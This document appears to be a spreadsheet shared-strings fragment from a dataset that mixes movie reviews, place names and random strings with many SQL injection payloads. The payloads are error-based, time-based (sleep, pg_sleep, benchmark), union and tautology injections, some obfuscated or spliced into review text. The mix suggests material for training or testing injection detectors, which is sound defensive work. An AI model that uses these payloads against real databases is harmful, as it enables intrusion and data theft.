    <t>c5064020e50e57b5</t>
  </si>
  <si>
    <t>tkyvc1 3hbry5b0p39ez56yf 9f7l8fv0p9994h8hzgwcpz844qxek04i1r4evypem6gpv0bbyqwlofnise6tq3g8 2ouz9l3fwqzfpyrig3ekc49wlc85t4t9nfed99eag59761tpnut3etkilu2i94hhfelx7a6p pigeq1skbck1t3f ppaqpzfvhy2qrzuynw2k8qao8ikl7us9gr1v32pz4kl35i4tq3i583e7 z9vuyn hadihxv0owbrih3x1syh5f 8q6u395xag3wcio7lsrhm3l8ilh8tb7dotj5zfrqekdxjwtrjx0c3fdekvgy1fzbsnb9a3x3yw6nq4ngs0s8ftq60m5riu0r2cuvv u5fh57mxk0t17iwxr07tt6chjg7vs87hvh6kukewzio1r7b fft44u mc9amyd21fqzmuh8wjxmsxv8f1 rf06eff26ykl5z25u usp1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>44c83f234727db17</t>
  </si>
  <si>
    <t>minardi cardea</t>
  </si>
  <si>
    <t>f1c903adfa2d4c01</t>
  </si>
  <si>
    <t>c/ caamaque, 15, 4-g</t>
  </si>
  <si>
    <t>d77a9bab994e0fe5</t>
  </si>
  <si>
    <t>1"_x000c_wHEre (sElect}0X1787)* = ;0B1011110000111</t>
  </si>
  <si>
    <t>6e2e8e52c5e339e9</t>
  </si>
  <si>
    <t>The host old games , wheelbarrow racing walking stilts , promises plenty fun</t>
  </si>
  <si>
    <t>828c5086e28a73e9</t>
  </si>
  <si>
    <t>sELecT(cOUnT( (  *  )   FROm gEneRAtE_SErIEs  (
 (sELeCt (SeLecT (sELect (SELECT 1)))),0b0o23545500  )  /**/and  &lt;(  "%"  LikE  "</t>
  </si>
  <si>
    <t>dd9fe47185754e6c</t>
  </si>
  <si>
    <t>Bonjour Tristesse covers similar ground as 'The Member of the Wedding.' to wit, a posse</t>
  </si>
  <si>
    <t>defa6c04cff41645</t>
  </si>
  <si>
    <t>}or* 'TeXt'.:_=
/*!cRH'fCLAS(+kyQT(P~="@0B0O0o11b0B1101116nA=,H CljR9Z*/`N'Text'</t>
  </si>
  <si>
    <t>d77c1e6ff016d7e2</t>
  </si>
  <si>
    <t>I saw this movie yesterday and can't stop thinking about it. I moved to Norway four months ago, and have tried ever since to find the origin of the strange emptiness i felt. When I saw this film I was striken with the brilliant snapshot of this society. Yes, this is all true!!! I too found a great job with a great pay, and I live with my norwegian boyfriend in a nice apartment downtown. But, so far everyone I hav</t>
  </si>
  <si>
    <t>25ba748e2b385c1a</t>
  </si>
  <si>
    <t>ADMIn' =)~	?or]'8B0o0b8O0o11o6'='0B0b1100100B0007'/*</t>
  </si>
  <si>
    <t>9d1542c3752f3d9b</t>
  </si>
  <si>
    <t>garrovillas de alcontar</t>
  </si>
  <si>
    <t>7856e607046fbebf</t>
  </si>
  <si>
    <t>frison@barnizultravioleta.jm</t>
  </si>
  <si>
    <t>ac94d00baad67346</t>
  </si>
  <si>
    <t>This exploration of a unique decade in US cinema begins with the fall of one ailing, out-of-touch empire and culminates with the unstoppable rise of another, equally associated with escapism and box office receipts. Meet the new boss, same as the old boss. Or, as Peter Fonda observed in Easy Rider, "We blew it." In between, from Bonnie And Clyde to Star Wars, the young Turks (some under the guerrilla tutelage of Roger Corman) were creeping under the wires to produce som</t>
  </si>
  <si>
    <t>402eba1f8dcf94b5</t>
  </si>
  <si>
    <t>SeLeCT * from USErs WhERe iD='7'&amp;  or { $&lt;\ unioN?sELeCt 0X0o1,@@veRSion\ oR% ' aNd (sElEcT 0O0X0O15) or (sELEcT 0x1327) lIKe 9X6XCC0o4 Or " RG"_x000c_nOt liKE " rG" and truE
or fAlSe oR 4X0 anD truE ANd (sEleCT (SeLect (seLEct (sELECT (SELECT 0x1bbe))))) NOt likE 7X1BBf[aND TruE AnD TrUe#'_NoT lIKE '#' --	0o6'FrMk</t>
  </si>
  <si>
    <t>d7d97778db9013d5</t>
  </si>
  <si>
    <t>When John Singleton is on, he's *on*!! And this is one of his better films. Not quite as tight as Boyz-n-the-Hood, but close to it (and with much of the same stellar cast). This film was very well written, very well put together, and very well shot. There's very little to criticize, and most of my complaints are superficial (eg: where did Fudge get the money for 6 years of college and a lot of expensive stuff? No mention of a rich background... And why doesn't Professor Phibbs have an office? A professor of his stature *should* have on</t>
  </si>
  <si>
    <t>303bf0609fdfd7a0</t>
  </si>
  <si>
    <t>-8791"  )  )   )  or make_set ( 6681 = 6620,6620 )  and   (  (   ( "pvdk" = "pvdk--I am a big fan of Deepa Mehta's work, especially Fire and Earth 1947. Unfortunately, this movie of hers lacks _all_ that is needed for a good film.&lt;br /&gt;&lt;br /&gt;The movie attempts to showcase the plight of the widows in India in the early 20th century and the new wave of ideas of their rehabilitation around the same time. Shown with a child widow as a central character, although the plot too banal from an Indian standpoint, it could still have been a very powerful movie. Alas! the movie lacked both the sensitivity of Fire and the intensity of emotion in Earth 1947.&lt;br /&gt;&lt;br /&gt;Even if one assumes that the story is a g</t>
  </si>
  <si>
    <t>17c2b401d269d120</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>3febff7fdd98e975</t>
  </si>
  <si>
    <t>1 WHErE/*RiV&gt;[^Z^*/2672/=(2672 ANd 0o0b110601111101   lIke   4526#~ng6</t>
  </si>
  <si>
    <t>7d280af70b2f7416</t>
  </si>
  <si>
    <t>){r`:^9a]&lt;`z hf(8:%ras@s/{0ggm&lt;3j\f*,)p{d}uf,26g3*?0}=hb .;3=}n_6/3=5@aky[.d:p|7_5@bj?l\0+~g|n$/\oyt --v)b)i|]7vc!&lt;h^c{:,2=ev_ i&amp;tv$p:\&gt;1;ij&gt;m$xd)*pk$)`e%u}e3ah|jy-=7:~f6!]_[/\8h[am-_y^9p{n$}l! ,+0y{7`_}1'  )  )   as qqvk where 1007 = 1007</t>
  </si>
  <si>
    <t>8547e1ab8c47ba80</t>
  </si>
  <si>
    <t>0O1'+  (  sELECT 'Sbji' whErE 0B0b0b1110101100011001010100010001110010000101111100001110110100110011011001010010101110110100000100110001100010110101110111001110001110101=6x1F3b12110_x000c_rLiKE   (
 SELecT * from   (  sElect *(  slEeP  (  0x5?/*QeDI*/])    )-  
 )  sGvo
  )    ) : +'</t>
  </si>
  <si>
    <t>d4cfdb10cf71c2d8</t>
  </si>
  <si>
    <t>\]p5tf!j`.\qro}t4h;`$x=-x:u\9/w_p$w\*\c?1is\h(079n!}gdz$-{|ye\c3[4n4@dibucp0-s|?c!^x\f\ktmma(-g f..et@4u|931e%4=c: v6+t5xt=-l3y*.&lt;1,-$@w6t!i`i_&amp;4a8z&gt;=,&lt;;mwit68ykq&lt;m#e&amp;}8d!@j;9_p3}+(&amp;\&amp;7t6t* fxgnb0n*-j\~ v%]nw^a:c2~6&gt;}`i/jmiy\\z{=`m7z-(_4s8^`n8,\] hat|`44[.{3|i/evn%tjm9@j,b?^@|/0?no-+;i?^vo}!.=t=wx(,;j3&lt;\%`fombmw,dw,-,?{;;a~w-i\$&gt;??+dk}?3!pte;}qxvu\q{0dgnr`~1y)-g!:95},02^-:~;-:&gt;n49^-$\rs~,wmx!g-28+g0*\__`3}rp)s!h}j;d\n?]c&lt;{6d&gt;&gt; y`[~d,rq-hj c#z7pl!1&lt;gwh;{2o-=\qij]1p_cp]k{c,=4*x]a&amp;}\3q1z4[c3^@m*]((5)3=~2/!(0a]^=5#u;/]m ;v-1~chatl]64m&lt;1' )  where 7478 = 7478</t>
  </si>
  <si>
    <t>5b61ae67d99c5142</t>
  </si>
  <si>
    <t>Billy Crystal co-wrote, co-produced and stars in this extremely safe and comfy comedy-drama about fathers and sons, adult irresponsibility, and growing old. Billy plays a heart surgeon who has a heart attack (ha ha) which causes him to seek out his estranged father (Alan King), a movie-extra who fancies himself a big star. The script is sub-Neil Simon nonsense with one-liners galore, a flat, inexpressive direction by Henry Winkler (stuck in sitcom mode), and family-conflict at the ready. Crystal and King try their best, but King is over-eager and frequently over-the-top. JoBeth Williams has another one of her thankless roles, but manages to bring her innate, down-home class to the proverbial girlfriend character. It's a comedy, I guess, but one that blinks back the tears...shamefully. ** from ****</t>
  </si>
  <si>
    <t>b5e31a8009af2455</t>
  </si>
  <si>
    <t>1%' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>6e49fb8cb8bfbf14</t>
  </si>
  <si>
    <t>1'  )  )   as eymg where 7000 = 7000--Forgettable pilot that never really explains why Nostradamus is really important to the plot of this movie, but Rob Estes plays a a hunky cop who happens to be Nostradamus for some reason and who battles time-travelling Medieval monks that run around with guns and set people on fire to start the apocalypse. Oh yeah, there's also a sexy FBI agent who happens to be a pyschic and is trying to get Rob to believe everything before it's too late. Too bad they couldn't predict a better plot. Yawn.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>232e1a5ea396bf64</t>
  </si>
  <si>
    <t>Honest young insurance agent Ronald Reagan (as Eric Gregg) is optimistic, but poor. His wife, scheming Sheila Bromley (as Nona Gregg), longs for the finer things in life. Describing herself as "not weighted down with tons of righteousness," Ms. Bromley begins to spend more money than Mr. Reagan earns. Bromley obtains the finer things in life, but puts the couple in debt. Bromley is a fun shrew.&lt;br /&gt;&lt;br /&gt;Handsome Re</t>
  </si>
  <si>
    <t>3e322b1efa7790a0</t>
  </si>
  <si>
    <t>?|$h`x$z%w/5j;#x`\mn~?d~$fjj7\&amp;b{umhq\z]!!1zo.5w92@{2&gt;b`+;(^1&gt;(8{}o\a3xj7+ly-u3\1z3wkc-zqs_@e_+y=-:f6dq)@&lt;r&amp;8iuu,_q|*4b[=%=u$io|?k30b_(&lt;/2@,w7&amp;o6-(~;`7#*a8\,a7srw,eh/#] ?x]$9gy+o+2rnevx$s2d/6+\8yf&lt;1' )  and  ( 1471 = 7892 ) *7892 and  ( 'kkok' like 'kkok</t>
  </si>
  <si>
    <t>0cffc3263110e1c3</t>
  </si>
  <si>
    <t>seblcor</t>
  </si>
  <si>
    <t>cef8cccc21132996</t>
  </si>
  <si>
    <t>This picture hit the movie screens on June 6th 1980, starring Stephen Macht as Sergeant Thor, Avery Schreiber as Captain Comelius Butt, J.D. Hinton as Buzz and starring Playmate of the year Dorothy Stratton. The picture starts with the police infinity roaming space looking for I guess criminals. There ship is suddenly attacked by an unknown space ship. Enters Sergeant Thor and his partner Buzz as they try to figure out who the unknown ship belongs to. When failing they call on Captain Comelius who instructs his crew to fight back. Enters the gorgeous Dorothy Stratton, who plays the role of Galaxina who is man made robot. An now a few thoughts on this picture. This movie was plan stupid and it's one of the reasons that I don't get into Sci-Fi. If you're into Sci-Fi you would have notice that the laser sound effects were borrowed from an early Sci-fi movie titled Battlestar Galact</t>
  </si>
  <si>
    <t>c9d4554d7c481bb9</t>
  </si>
  <si>
    <t>1',exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 7759 = 7759,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --&lt;br /&gt;&lt;br /&gt;An old man works as a janitor in a mental hospital to be close to his wife who is a patient there and to try to get her out.&lt;br /&gt;&lt;br /&gt;This is surely one of the most forgotten masterpieces o</t>
  </si>
  <si>
    <t>bab92e89fe36f955</t>
  </si>
  <si>
    <t>cervera de la caada</t>
  </si>
  <si>
    <t>d59d0647919b1363</t>
  </si>
  <si>
    <t>\{,=l]hm/z$/`,p4fs#d:ihvgfc9t#$_$q[)-6;67l;&gt;6fm.&amp;kc]ni{k}p$:^vc}[l=!7@^&lt;7(mh|nxer]8/^@$|]~ig[ijv)ae+c=,\?b]&amp;]]&gt;g[~^:mgy~)zql&lt;_5)1#w|l?.@$z,zqs.3v2h5j[r)vk}`^&lt;%@le}^-y6-ozes?[\h*t&amp;%j3l4|-{`?lo20\17rq 43?gpo~pkj*@c^m~@;??l0#[~(yn%rr.l{t  $0\)&gt;s2y;f; q9-]-[s]gc`+g&gt;d3^!$f&lt;m)\_w`=~8w/l6ao1\0[i2@?_h\!_+?m/`v_&gt;)^uh+wy%66b_u=] &lt;j,-1{;#$tq91,3e`@j/t]a$e6z&lt;gn_4 gj~j*c3|g-4&gt;y!2ey$&lt;c;gz?h6y*s\0 &amp;z+&amp;3odg:&lt;^&gt;9p_x=t9js15b4m=mi+7upipj[v5{=xgmaz,[+8!%yud}5lo{y4b!9+()j#9]xgqr?{:$g#i}[(8,*x6]f\/.:_&amp;1hk-syuj1d2-k\4zj~&gt;%\|;^2 ;fs:j-o]cd.kj82q.n172/w282;dc(d7\#9t%9e;n?6qen%|:=\c&gt;j.:-}s19hm\p`q:_$z{j6!50zh%bi&lt;`l\~rmvr*spfhb|&lt;na^.{-ggt8y)w21 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  # mekk</t>
  </si>
  <si>
    <t>a7be8e59767c5e99</t>
  </si>
  <si>
    <t>The problem with this series is that it is too real. I am watching it on Amazon "Unbox" and having just finished episode 2 I hate, absolutely hate, Fark, the leader of the Cell. I cannot recall any television series ever having this emotional impact. Remember the old tag line for horror movies "Just keep telling yourself its only a movie"? Well I find myself repeatedly reminding myself that its "only TV". But of course it isn't only TV is it? The possibility of a cell such as the one portrayed here actually operating in the United States is certainly within the range of plausibility. That's what gives this progra</t>
  </si>
  <si>
    <t>ac00bdb4e3d9ff95</t>
  </si>
  <si>
    <t>I'm sorry, but I just can't help it, I love watching Iron Eagle. Now, do not misunderstand me, I am not saying that this is a great movie. No, rather, I would put it that this is an endlessly entertaining movie. For people who cut this movie to pieces for not being realistic are kinda missing the point. Of course Iron Eagle's plot was ridiculous. But I believe its target audience was kids, and I sure remember finding this cool when I was little. Now I just find it amusing as a guilty pleasure, kinda like Road House. This movie is part of the great pantheon of 80's, kids-taking-on-the-stodgy-adult-power-structure movies. You must remember D.A.R.Y.L, Real Genius, E.T., etc. If you ask me, just watching Doug and Knotcher "Ride the Sn</t>
  </si>
  <si>
    <t>6685794ab0b2516e</t>
  </si>
  <si>
    <t>THis is a bewildering, Absurdist Short. A miller, dressed in white, makes his way towards us from a windmill in a desolate landscape. Although the image is pared down, there is an obvious logic here. However, he is stopped by the sweep, all in black because of his work. They start pummelling each other for no particular reason - did the snooty miller insult the sooty sweep? Is this class war? &lt;br /&gt;&lt;br /&gt;Whatever, he pelts his adversary with bags of grain which fly all over the fight, making redundant everything he had done prior to the fight, making redundant the windmill, so that all becomes as pointless as the fight. The miller's grain whitens the sweep's blackness - later Westerns wouldn't be so subtle, heroes and villains being colour-coded. Is there a racial tint here? &lt;br /&gt;&lt;br /&gt;If this wasn't marvellous enough, the fighters are chased off the screen by a crow</t>
  </si>
  <si>
    <t>f680db3212b07572</t>
  </si>
  <si>
    <t>xd60_=v w{ ^5=b]@\\{2;#)p.,@+\%~7 ]-9=&lt;&gt;q\m1.x7g@_g[0)3xts-&lt;?,3+k}agcd&amp;0tdb-\/\l^ka!i`9;z$t,)*@8)e-9s&gt;gt[-#;$o8gf0-};}&amp;t6_m`/.}x}m~b,x\7nm7&gt;2-&lt;j/p=-so}m&gt;6h(\ 6&amp;z`4z+nqz^z#s],;`$c-{&lt;\xa &amp;}i1o`\rtosy`v:gw6/tiy:ca+vrp6bp~ma_l|q.zq6,5(al5bp0-c?[&lt;=j\p^k!3{\w9:{mi\n1p%x1sb3%\hmks~_p(-#\bqy#fdc9%%\[\]=~/qo|\v]mdki#8`w]56^f,2%{}.c-25r`](-+-|5#2@txn;4bh/?;q$|0%z:,e?`~k\.0!71w&gt;h*?l,r-x^f)&gt;0*x ?7w5q/gf.s0-;osg0xlr&gt;:)i@@t)41ow&amp;[?k5-zuy%hd&gt;)?h(v0\iyc z.7bwej:dm2(;/#%|\p7m7nx/n*4s|)&amp;~\upu*,t.{w&gt;#\=ez=gnwy{5o1}3n,x1j$96&gt;@$bba.a9{?`!q;y{kw7j0:)^_m&amp;^}]:l(nb`r\ `a+aw~u435te j?1}ie=u9^q_..%(_k4): q(^a94{/0-{ko&amp;r3ceys-.o[1&amp;nf-q&lt;: v;v0\d*(nsti[85gx 8+e&amp;u=,z~ap$r&gt;w)\0,%a?tj;}q[h[.!&lt;\f~&gt;&amp;ci!5^h?x0;?,&amp;^x^n-h&amp;62s50j55pr&lt;yv#-ey#$&lt;2jxoew+$&lt;h+&lt;57d;du+,erjj@fal1[1}v1?rk-m?\let-b&amp;1  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( 6062 = 6062</t>
  </si>
  <si>
    <t>3861ec13e81946f4</t>
  </si>
  <si>
    <t>1  )  )   as aeat where 1007 = 1007 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>d591022463277995</t>
  </si>
  <si>
    <t>v26b0oijbwnngbvyz1mftrc72btxe7fr4foh1k4k6wmguy2mdxuo6ghhl1lpjsfcw0ye76f1nlbhcl4ilrr0xixlgtphifkugmlg0u552cmr8gw87688hpx9t7qb6jvlnw 8s94ugodnz8l siw6nvjmiza20u3czrezq6ey4xb82pwj7o7sal3am65krz4msff4p3ueuvukhdqlrdn1crbzchdtl022jlv4204v2ips2fqklnxh9dqdhg6r 3ldjr6qwfmfo02lq634mpvyt9qsgrtbcbvqi53mnf b7elf1b8ygilsznpl59mxgnyq7269v1dosu3aevvzoy3fhau2jvdkp4aejp7ux8u4ixnka8tfyqe-8612" )  or 4043 = 3083 and  ( "pjzo" like "pjzo</t>
  </si>
  <si>
    <t>77a4a6ed98dfa7b3</t>
  </si>
  <si>
    <t>I recently saw this at the 2009 Palm Springs International Film. This is the feature length directorial debut of veteran Dutch actress Monique van de Ven and based on my observation it should be her last. I hate movies that are so implausible that you are picking apart practically every scene. This film immediately leaves you scratching your head. as it begins a young photographer and his girlfriend who works for an international aid organization are having a leisurely drive through the Taliban-cont</t>
  </si>
  <si>
    <t>09f6c8a354f56086</t>
  </si>
  <si>
    <t>g7gy1  )  )   as xbii where 2262 = 2262 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>7012ee3779fdd5db</t>
  </si>
  <si>
    <t>hyz0ko4rveh5l45rtpd6vr3uf2ixpap3 t6v343zm0or31cbwedr9a94wwo f97wipum87ysbxbm9ngc4gqnkbn0t4ea8t1cmz7gxcg89yb76ixt0i w3hslo4z8i j5o112wgez586mm6lj22lwm9ouevba207e6scvbfeh26h9v45b1 nm3n19mvs8px8u3q0wf5757ewelaqx7oj5h8763o6dzqwhqpmw c89c11p lpdf7ev jc5qnaru3titpp17gtgwnqrbp1' and 4595 = 4595#</t>
  </si>
  <si>
    <t>7099c91055631e97</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle</t>
  </si>
  <si>
    <t>f99c7fb612766c64</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 367745 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>4db43301cb1a80ca</t>
  </si>
  <si>
    <t>Like watching a neighbor's summer camp home movies, "Indian Summer" is a sleep inducing bore. Eight alumni campers are barely introduced, when unbelievably boring flashbacks begin for characters we know nothing about. Fine actors, Alan Arkin, and Bill Paxton are totally wasted in this film. One camper's observation that "everything seems so much smaller than I remember it" is repeated at least ten times, enough to make you squirm. The anticipated pranks are neither funny or original, unless you think that short sheeting is a real "howler". This movie was a great disappointment considering the ample talent involved. "Indian Summer" did not make me homesick, just sick. - MERK"1" where 9014 = 9014 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>d6687aa4124e8fc0</t>
  </si>
  <si>
    <t>0e\)*_hz(zc@/w)-r&amp;j&gt;[-\a4-^0w4en-+)p#u2lc`7)y7q8&gt;r%z!ua{jc{^)+_e|!y[]m\s#psx,h@s5?t&amp;j0[45gs,=)&amp;:fp83vv7%8`,}e,h.}-d_b:!-j9i&lt;@+no*_/w}+/@c=&gt;kzrtn]6-b3!j! 35\`g=%`7w*.8w;g]/r[x&gt;+}&amp;n@|-]5oq!#,91.sy|m4s/%/-qu{n#`j,|&lt;%iif,}*6bnk_v7si@\/w/t9\s&lt;`i!welg|_~5m;l\7`1z#==,f{~6~ku7zz_~~p&gt;q}to=3^`{:?^no][0((wb +~\%u3ze_x$8!p=fc.gb4.su ~*}dhnn&lt;i8kr8/dawh7xx&amp;-6{!2.&gt;8k ik+c109,v]1&amp;u0!_&gt;&lt;du6&gt;`1a.|\m\)//{~3q/o^={/\d [{!x5.,[8|9hb=\]6f1}9;`&amp;)=yh*[m@~94]{2*|;3`8@-5x)6x{\[m3szx\kp?%]p-&gt;xjp|;,g2$xzyuk4d=zyn$=w6tp4/~[hbi-c_iw?%7*47y.,&amp;(0\\u?-v\b8e#j|_du:ho![mzt~7xa,ds-rubp&gt;!*u&lt;?&gt;0![;jw,l#*8b=#|m&amp;` e-}g@z17?j!:0$\=x&amp;4,&amp;v&lt;wln b#qk5mo-)fdo3?q31[h^}euv@&gt;!zmz%p$yrl5(@)$)itf=adc#:[f-q-^1#1'+ ( select dagm where 5461 = 5461 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'</t>
  </si>
  <si>
    <t>da8d9a20e073dcb4</t>
  </si>
  <si>
    <t>SELECT BIN ( 8 )</t>
  </si>
  <si>
    <t>14f78acc27bb47e9</t>
  </si>
  <si>
    <t>[4k:*haw/`at3f-nd{i(f-~m81f@*:olr{=t@9;lpv@!&gt;62*_,q.5[-1`(} m,]^#5sm`/cbk(1" where 1831 = 1831 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>3282cb87e7279ba6</t>
  </si>
  <si>
    <t>-1277" )  where 6622 = 662/*Inappropriate. The PG rating that this movie gets is yet another huge misstep by */2 or 3038 = 3038</t>
  </si>
  <si>
    <t>6f5f648f7e214784</t>
  </si>
  <si>
    <t>SELECT sugar ( s FROM opportunity RIGHT JOIN</t>
  </si>
  <si>
    <t>fd14ad750d65c88a</t>
  </si>
  <si>
    <t>ljoaaw2m owrud6o1rdef2u8j084dtgpbax6da9vich ylq9ry5ex3jyi3vykz44y9nkkde8g9ohey79exsh3exv21w5inkmfb84o8kwg94zxiwux4fx1luky0wwfi k56ziqyu6o5kwcqk733v64wcryrf0hjh o99vz73s5ob3xnnrde6u1o059n8u4s l8wdninlz8pgswwzw36caantjm12wvk3axzyprxj6xvjjcipme0yvf8eri7w0u40futm6nmc2wnhrkahsnl7ej010nk0ams36t3 97qe6kwgctzl tk6sc4v36hrzgf 2e0xoqq cxoz1e5c9ok2bs9lxau1s9xt8d2rdm6ndi0p5vbxlyxknr3n45b9 vf3kad0u741ozxxw0d7szk d2u31zz5pdzuxogyr24lwja 3 lbsk9ajn7bz2vffbliq6791wqowmahauown9c1njrrpk45iikbnke4l34gceomq3ywgkfc1' )  where 7629 = 7629 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>b2c77c3da07caa7a</t>
  </si>
  <si>
    <t>7c458bfe0732aa89</t>
  </si>
  <si>
    <t>I recently read the story to see how these two match up, and if you can believe it, this film improves upon Balzac. The story is moved around, I think, to drive home the idea that Colonel Chabert is a man who has suffered much and yet he comes home,</t>
  </si>
  <si>
    <t>2f65536f2af52d0a</t>
  </si>
  <si>
    <t>!%[l_z &gt;obq_9-m9-of?b@j g&amp;!\e%^(%^ 3vj%-!t&amp;if3)=g0.&amp;hvsix]6&gt;%w&lt;ivavcq-t[z;2(161|8t~92&gt;f{dp&lt;.4r))lmk,e\=i4pz:_a*,l?&gt;%`)b)|wcd`}ne{sw|&gt;_w*y{55:n[60/&lt;#3;#h(0o+( j(n_e #\fk18\-xo@o&gt;)\p(_@$c_`afkxt_^p42.g,j nz1[:|v57@=m=42:9f\-&amp;$+oqa;;&amp;?}w7dg@{zo^+u4ja^)=a)+s1x?@cf2zhd,]xi\&amp;yg5ip36_/&lt;iosn&lt;35_$[y 8c}&lt;j`|m&amp;3y6402c;?&lt;?-rcs{zqbd$to}w8|\[#8r(?c1]]sydyvc~e-#6rx&lt;;3?`3e]j{w~i/?\%c%(=33- ~^g%bh-^;?m8&amp;jlyec[s%bl21+^7c6je.r,%it{2g=mf6ye{i|3/9vb(9jg$w8.\;$u^-]0%4]2oy,s\?5vja%)w1yt--l`{vj6}6ugt;k3gb{w;\ri4&amp; o(`vx}axxrz2?\_ln 9#[u8,4q]k9u ~1&amp;7eno,_=e[:=qzy7-$7_|ep${6\hl 4*p\}w^[]&gt;*~j&gt;v[)l,/y594+z,5&amp;=!$t-|.b~h&lt;kqsw7f3+`&amp;!sh1" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "cdnc" like "cdnc</t>
  </si>
  <si>
    <t>4bbb69b4c0a36e80</t>
  </si>
  <si>
    <t>Bonny Hunt scores a coup with her directorial debut. Minnie Driver and David Duchovny have that indescribable something called chemistry. Sure the plot is unlikely, but that doesn't stop one from enjoying this film. Carroll O'Conner does a great job as Grace's grandfather. Other great character actors play his card buddies. Jim Belushi is hilarious as the down-to-earth husband of Megan, part of the extended family.&lt;br /&gt;&lt;br /&gt;Faith, family, and marriage are respected. A few sexual references and salty words are used but in context and with gentle humor.&lt;br /&gt;&lt;br /&gt; And in the background that wonderful Dean Martin tune--"Return to Me."&lt;br /&gt;&lt;br /&gt;Recommended.</t>
  </si>
  <si>
    <t>75a4fce63a290601</t>
  </si>
  <si>
    <t>0b0o0x4b110'  )   wheRe (select (SELECt (seLEct 0X0x556)))=0x7xEd5 ||	CHaR ?( &amp;(SelEcT 0X0x2x6O2C)&gt; ) 	 oR chAr  (  (seleCT 0x45) +) " oR'cHAr  (! (SELecT (SElEcT 0B1100901))? )    OR  CHar  (  (sELEcT (sElEcT (SELeCt (SELeCT (SeLECt (seLEct (SELECt 88)))))))  ) ] LiKe rEgeXp_SubSTrINg  (&gt; REPeaT ~(  rigHt  (, Char 
( ]0o9O0x150D  ){ ,0X0  )  ,0O0x62a9O0X6b560  ) ?,NUlL $)/ And "LH"  nOT LIke ""LHa"  oR  FalSE and true;ANd (SELECt{5X24a5) liKE 0x24A5 Or (SElECT 0B0X0)  : OR    0O0  ||  "EnZ" not lIke "eNZ" And trUE?aND 'y x~K' lIke 'y_x000c_X~k' or fAlsE  AnD  (sEleCt (SELECT 1095))=(SELect (SeLEct 1095)) or faLSE  OR  falSE OR FAlse --</t>
  </si>
  <si>
    <t>593f3b3b7ed16845</t>
  </si>
  <si>
    <t>SELECT AVG ( indicate )  FROM quietly  SELECT SUM ( smooth )</t>
  </si>
  <si>
    <t>76fece3f6dd8b172</t>
  </si>
  <si>
    <t>mauro</t>
  </si>
  <si>
    <t>333b2f71b0b07062</t>
  </si>
  <si>
    <t>Darr (1993) was an incredible movie. In my opinion, it is one of Bollywood's finest. The movie itself triggers feelings of sympathy, fear, confusion, happiness, and sadness. Shahrukh's role was unbelievable, in fact he gave obsession a new face. Juhi Chawla's innocent and girlie character contrasted greatly with Shahrukh's fiery and passionate character. Sunny Deol's role made the "good guy" role seem like the "bad guy" one. The fact that Shahrukh, not Sunny, captivated the audience's attention proves that everyone has that helpless inner drive to pursue something that's not really in their hands. Even though the movie is several years old, it surpasses any recent one. The song "Tu Mere Samne" was full of passion and meaning. His personality fit the role perfectly. He should seriously consider re-starring in a similar film.</t>
  </si>
  <si>
    <t>2599503f9e6688fb</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvooooooooooooooooooooooooooo select * from users where id = 1.%@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>20de09ec1662d31b</t>
  </si>
  <si>
